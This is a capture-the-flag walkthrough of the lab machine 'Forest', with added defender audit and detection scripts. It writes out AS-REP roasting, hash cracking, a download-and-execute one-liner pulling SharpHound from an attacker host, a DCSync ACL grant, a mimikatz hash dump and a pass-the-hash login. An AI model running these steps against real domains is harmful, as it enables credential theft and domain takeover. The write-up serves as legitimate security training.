Forest
Adopt the pace of nature!
Forest is an easy-difficulty machine running Windows. It tests your knowledge of basic enumeration and privilege escalation using common commands, as well as tools such as BloodHound.
Be sure to check out the Basic Setup section before you get started.
Enumeration
As always, enumeration is our first port of call. Let's take a look at the machine and see what we are dealing with.
Portscan
portscan forest.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-07 14:53 GMT
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-11-07 07:00:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -5h13m08s, deviation: 4h37m12s, median: -7h53m11s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2019-11-06T23:03:07-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2019-11-07T07:03:05
|_ start_date: 2019-11-07T06:39:53
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 300.76 seconds
From our scan we can see a few things of interest: SMB, Kerberos and WinRM are all exposed, and each can be useful in gaining access.
Enum4Linux
Let’s see if we can grab any useful info:
enum4linux forest.htb > enum4linux.txt
We can then check to see if we have found any users:
cat enum4linux.txt | grep -i users
.... SNIP .... .... SNIP .... .... SNIP .... .... SNIP ....
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\Administrator
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\krbtgt
.... SNIP .... .... SNIP .... .... SNIP .... .... SNIP ....
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\sebastien
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\lucinda
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\andy
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\mark
enum4linux.txt:Group 'Domain Users' (RID: 513) has member: HTB\santi
Looks like we have found a few… Nice! Let's make a list of just the usernames, with all the other junk taken out.
User
Since we have usernames but no passwords, let's check whether any of the users have Kerberos pre-authentication disabled. This is called AS-REP roasting, and we will use one of Impacket's example scripts for it:
GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
Checking our output file we see that we have grabbed a hash:
cat hashes.asreproast
$krb5asrep$23$svc-alfresco@HTB.LOCAL:d36a3e9c1a66....fedc13432f1$981ae7bbc66fa7e5b60ef5cbd49a1c66709cf03165607db827c1af40deae1f2d8470aac43a226907
2020340bdbd2e1e8752ee190cc3ef007aa8db1a0e4ad5871bf80f874b6add353ed0c87950c9e5ed2b3b9d9bb4a41862cc417f24ef109cd97d1fd79c2c4cea7751bd674d60bc772d31
9ffac306c07c788bac33bba6021acd61ed849e0dcee....a58d61b36ffdf5c1127bb1c115b53c48071328d9bcd5cc9bf0dd021e56ff3fa2aa4e98a113b465982a127d60fa4960c0d3
8d7b6e45975f95fbd45ccf....84f1ea0bf47473f8e3aac56518fc263c7407d67fb6bea4074b98c
Let’s try and crack the hash:
hashcat -m 18200 --force -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6800K CPU @ 3.40GHz, 2048/5918 MB allocatable, 4MCU
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 6 secs
$krb5asrep$23$svc-alfresco@HTB.LOCAL:c32a238add6ade578c169b14a26203f5$49f40b19377f04ea05fc9474c79e3e0242685fb533b0e2c7ad6e41b688221def0bcbf0caa7e
588c01e01132495dd8bc9ec3f5c3afba95bc891f64e18fcb666831f23a0bf2aff1860e36f1c06588ac89182b37980938d9b97a3876b7096434de2f08bc7b8885e974d5f6529dc9e0f
fd174a6b23460d0e5c76ba2c2613506c1be1fbbf678464980af717d9fe576fe77310ff97442eb205e18a380b539199658b40246634714bad41808ff2e6542ac86a5e64b94073c1f4b
40d83d6fe6d84dab9ecfed80a14301c935276f16db4d35f83f264a460450ab1d248e34bbc7d7904883ce4fd505d1ec0:s3....ce
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:c32a238add6ade...5d1ec0
Time.Started.....: Sun Nov 10 13:54:23 2019 (8 secs)
Time.Estimated...: Sun Nov 10 13:54:31 2019 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 543.7 kH/s (6.04ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4087808/14344385 (28.50%)
Rejected.........: 0/4087808 (0.00%)
Restore.Point....: 4079616/14344385 (28.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: s9039554h -> s2704081
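The condition that made this possible is a per-account flag a defender can audit and clear, and the request itself leaves a distinctive entry in the DC's Security log. The following is an added defender-side example, not code from the original write-up; it assumes the RSAT ActiveDirectory module and read access to the Security log on the DC (named FOREST in the scan above).

```powershell
# Added defender-side example, not part of the original write-up. Assumes the RSAT
# ActiveDirectory module and rights to read the Security log on the DC "FOREST".
Import-Module ActiveDirectory

# 1. Audit: accounts with "Do not require Kerberos preauthentication" set.
#    This is the DONT_REQ_PREAUTH bit (0x400000 = 4194304) of userAccountControl,
#    matched with the LDAP bitwise-AND matching rule 1.2.840.113556.1.4.803.
$roastable = Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' -Properties LastLogonDate |
    Select-Object SamAccountName, Enabled, LastLogonDate
$roastable | Format-Table -AutoSize

# 2. Remediate: clear the flag on every enabled account that has it.
#    -WhatIf only shows the change; drop it once the list has been reviewed.
foreach ($u in ($roastable | Where-Object Enabled)) {
    Set-ADAccountControl -Identity $u.SamAccountName -DoesNotRequirePreAuth $false -WhatIf
}

# 3. Detect: a TGT request (event 4768) with PreAuthType 0 and RC4 (0x17) is what an
#    AS-REP roasting run leaves behind. Grouping by source address makes one host
#    requesting tickets for many accounts stand out.
$events = Get-WinEvent -ComputerName FOREST -FilterHashtable @{
    LogName = 'Security'; Id = 4768; StartTime = (Get-Date).AddDays(-1)
} -ErrorAction SilentlyContinue

$events | ForEach-Object {
    $xml = [xml]$_.ToXml(); $d = @{}
    foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    [pscustomobject]@{
        Time    = $_.TimeCreated
        Account = $d['TargetUserName']
        Source  = $d['IpAddress']
        PreAuth = $d['PreAuthType']
        EncType = $d['TicketEncryptionType']
    }
} | Where-Object { $_.PreAuth -eq '0' -and $_.EncType -eq '0x17' } |
    Group-Object Source |
    Select-Object @{n='Source'; e={$_.Name}}, Count,
                  @{n='Accounts'; e={($_.Group.Account | Sort-Object -Unique) -join ', '}} |
    Format-Table -AutoSize
```

Accounts that genuinely need the flag (rare, usually legacy clients) should at least get a long random password, since the AS-REP can be cracked offline at the speed shown in the hashcat output.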
We have valid credentials! Let's see if we can log in via WinRM:
PS htb\svc-alfresco@FOREST Documents> cat ../Desktop/user.txt
e5e4e47ae7....013fb0d9ed
We have the user.txt flag. Let's move on to root!
Root
Taking a look at the groups our user belongs to, we see a couple of interest:
PS htb\svc-alfresco@FOREST Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================ ====== ============================================= ==================================================
.... SNIP .... .... SNIP .... .... SNIP .... .... SNIP ....
HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
To find a path to owning the Domain Administrator we will use BloodHound. We grab the data we need by using SharpHound:
PS htb\svc-alfresco@FOREST Documents> powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadString('http://<attacker-ip>/SharpHound.ps1');Invoke-BloodHound -CollectionMethod All -SearchForest -Domain HTB.LOCAL -DomainController FOREST.HTB.LOCAL -LDAPUser svc-alfresco -LDAPPass s3....ce -ZipFileName bloodhound.zip -Verbose"
Initializing BloodHound at 7:49 AM on 3/21/2020
Manually specifying a domain controller will likely result in data loss. Only use this for performance/opsec reasons
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for HTB.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for htb.local : FOREST.htb.local
EXCH01.HTB.LOCAL did not respond to ping
Status: 123 objects enumerated (+123 61.5/s --- Using 148 MB RAM )
Finished enumeration for HTB.LOCAL in 00:00:02.6399943
1 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc-alfresco\Documents\bloodhound.zip.
You can upload this file directly to the UI.
Finished compressing files!
We can then download bloodhound.zip and load it into BloodHound by going over to the right side and selecting Upload Data from the vertical menu.
On the left side we see Database Info, and to the right of that we click on Queries, then select Find Shortest Paths to Domain Admins.
This gives us a nice overview of the path we need to take:
As we expected, we move through the groups we saw earlier until we find that we are also in the Account Operators group, which has GenericAll permissions. We also see the Exchange Windows Permissions group, which would give WriteDacl privileges.
If we hover over GenericAll we can right click and select Help:
From here we get literal instructions to add ourselves to the Domain Admins group with PowerView, which seems a little too hopeful. Downloading PowerView to the victim machine and trying this results in Permission Denied.
Using the Exchange Windows Permissions group instead, we get some success:
PS htb\svc-alfresco@FOREST Documents> Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members 'svc-alfresco' -Verbose
Verbose: [Add-DomainGroupMember] Adding member 'svc-alfresco' to group 'Exchange Windows Permissions'
We see that we have been added to the group when we check with net user svc-alfresco. However, after some time it disappears, meaning the account is reset to avoid spoilers.
So we will try to create another account and add that user to the Exchange Windows Permissions group:
PS htb\svc-alfresco@FOREST Documents> $SecPassword = ConvertTo-SecureString 's3....ce' -AsPlainText -Force
PS htb\svc-alfresco@FOREST Documents> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS htb\svc-alfresco@FOREST Documents> $UserPassword = ConvertTo-SecureString '<user-password>' -AsPlainText -Force
PS htb\svc-alfresco@FOREST Documents> New-DomainUser -SamAccountName sabe -AccountPassword $UserPassword -Credential $Cred -Verbose | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred -Verbose
Verbose: [Get-PrincipalContext] Using alternate credentials
Verbose: [Get-PrincipalContext] Using alternate credentials
Verbose: [New-DomainUser] Attempting to create user 'sabe'
Verbose: [New-DomainUser] User 'sabe' successfully created
Verbose: [Add-DomainGroupMember] Adding member 'CN=sabe,CN=Users,DC=htb,DC=local' to group 'Exchange Windows Permissions'
Oh, and we almost forgot! Add your new user to the Remote Management Users group:
PS htb\svc-alfresco@FOREST Documents> Add-DomainGroupMember -Identity 'Remote Management Users' -Members 'sabe' -Verbose
Verbose: [Add-DomainGroupMember] Adding member 'sabe' to group 'Remote Management Users'
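The path BloodHound drew runs entirely through group nesting (Service Accounts into Privileged IT Accounts into Account Operators), and each step above is a group-membership change that a DC logs. The following is an added defender-side example, not code from the original write-up; it assumes the RSAT ActiveDirectory module and read access to the Security log on FOREST, and uses the group names seen on this box.

```powershell
# Added defender-side example, not part of the original write-up. Assumes the RSAT
# ActiveDirectory module and read access to the Security log on the DC "FOREST".
Import-Module ActiveDirectory

# 1. Audit: which users reach a sensitive group only through nesting? Account Operators can
#    add members to most groups and Exchange Windows Permissions holds WriteDacl on the
#    domain, so a service account landing in either one via nested groups is a finding.
$sensitive = 'Account Operators', 'Exchange Windows Permissions', 'Remote Management Users', 'Domain Admins'
$report = foreach ($g in $sensitive) {
    $direct = Get-ADGroupMember -Identity $g | Select-Object -ExpandProperty SamAccountName
    Get-ADGroupMember -Identity $g -Recursive |
        Where-Object objectClass -eq 'user' |
        ForEach-Object {
            [pscustomobject]@{
                Group  = $g
                User   = $_.SamAccountName
                Nested = ($direct -notcontains $_.SamAccountName)   # reached via another group
            }
        }
}
$report | Sort-Object Group, Nested -Descending | Format-Table -AutoSize

# 2. Detect: "member added to security-enabled group" events, 4728 (global), 4732 (domain
#    local) and 4756 (universal). TargetUserName is the group, MemberName the new member's DN.
$events = Get-WinEvent -ComputerName FOREST -FilterHashtable @{
    LogName = 'Security'; Id = 4728, 4732, 4756; StartTime = (Get-Date).AddDays(-7)
} -ErrorAction SilentlyContinue

$events | ForEach-Object {
    $xml = [xml]$_.ToXml(); $d = @{}
    foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    if ($sensitive -contains $d['TargetUserName']) {
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Group   = $d['TargetUserName']
            Member  = $d['MemberName']
            AddedBy = $d['SubjectUserName']
        }
    }
} | Format-Table -AutoSize
```

A service account such as svc-alfresco adding itself to Exchange Windows Permissions, or a brand-new account appearing in Remote Management Users, would show up in the second table with the service account as AddedBy.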
Now let's log in with our new user.
Going back to BloodHound, if we hover over WriteDacl we can right click and select Help once again:
Again we get instructions on how to give ourselves DCSync rights, which will hopefully allow us to extract the hashes of the Domain Administrator.
Let's try doing this with the user we just created:
PS htb\seth@FOREST Documents> $SecPassword = ConvertTo-SecureString '<user-password>' -AsPlainText -Force
PS htb\seth@FOREST Documents> $Cred = New-Object System.Management.Automation.PSCredential('HTB\sabe', $SecPassword)
PS htb\seth@FOREST Documents> Add-DomainObjectAcl -Credential $Cred -TargetIdentity "dc=htb,dc=local" -PrincipalIdentity sabe -Rights DCSync -Verbose
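The ACE written here grants the replication extended rights on the domain object, and the replication request mimikatz then makes is logged as a directory service access. The following is an added defender-side example, not code from the original write-up; it assumes the RSAT ActiveDirectory module (which provides the AD: drive) and that Audit Directory Service Access is enabled on the DC, otherwise there are no 4662 events to search.

```powershell
# Added defender-side example, not part of the original write-up. Assumes the RSAT
# ActiveDirectory module and "Audit Directory Service Access" enabled on the DC "FOREST".
Import-Module ActiveDirectory

# The three schema-defined extended rights that together permit replication (DCSync).
$replRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# 1. Audit: who holds these rights on the domain head? Out of the box only Administrators,
#    SYSTEM and the domain controller groups should; any other principal is a persistence ACE
#    like the one Add-DomainObjectAcl wrote above.
$domain = Get-ADDomain
$expected = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM',
              'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
              "$($domain.NetBIOSName)\Domain Controllers",
              "$($domain.NetBIOSName)\Enterprise Read-only Domain Controllers")
(Get-Acl -Path "AD:\$($domain.DistinguishedName)").Access |
    Where-Object { $_.AccessControlType -eq 'Allow' -and $replRights.ContainsKey($_.ObjectType.ToString()) } |
    ForEach-Object {
        [pscustomobject]@{
            Principal  = $_.IdentityReference.Value
            Right      = $replRights[$_.ObjectType.ToString()]
            Unexpected = ($expected -notcontains $_.IdentityReference.Value)
        }
    } | Sort-Object Unexpected, Principal -Descending | Format-Table -AutoSize

# 2. Detect: a 4662 whose Properties list one of these GUIDs, raised by anything that is not
#    a machine account (name ending in $), is a user-initiated replication request.
Get-WinEvent -ComputerName FOREST -FilterHashtable @{
    LogName = 'Security'; Id = 4662; StartTime = (Get-Date).AddDays(-1)
} -ErrorAction SilentlyContinue | ForEach-Object {
    $xml = [xml]$_.ToXml(); $d = @{}
    foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    $hit = @($replRights.Keys | Where-Object { $d['Properties'] -match $_ })
    if ($hit.Count -gt 0 -and $d['SubjectUserName'] -notmatch '\$$') {
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Account = $d['SubjectUserName']
            Right   = $replRights[$hit[0]]
        }
    }
} | Format-Table -AutoSize
```

Removing an unexpected ACE from the first table closes the hole, but the krbtgt and Administrator hashes must be treated as exposed once a 4662 of this kind from a user account is seen.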
Now we can use mimikatz to extract the Administrator hash:
PS htb\sabe@FOREST Documents> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : Administrator@htb.local
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 9/18/2019 10:09:08 AM
Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID : 500
Credentials:
Hash NTLM: 32693b11e6....72a07ceea6
We can now log in using the NTLM hash:
evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6....72a07ceea6
Evil-WinRM shell v2.0
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
f048153f20....04d79129cc
Now that was an interesting one!
Conclusion
This box was really fun to do, and fun to help people with as well. The concept was real-world in the sense that these are misconfigurations that can help an attacker gain unauthorized access to a machine.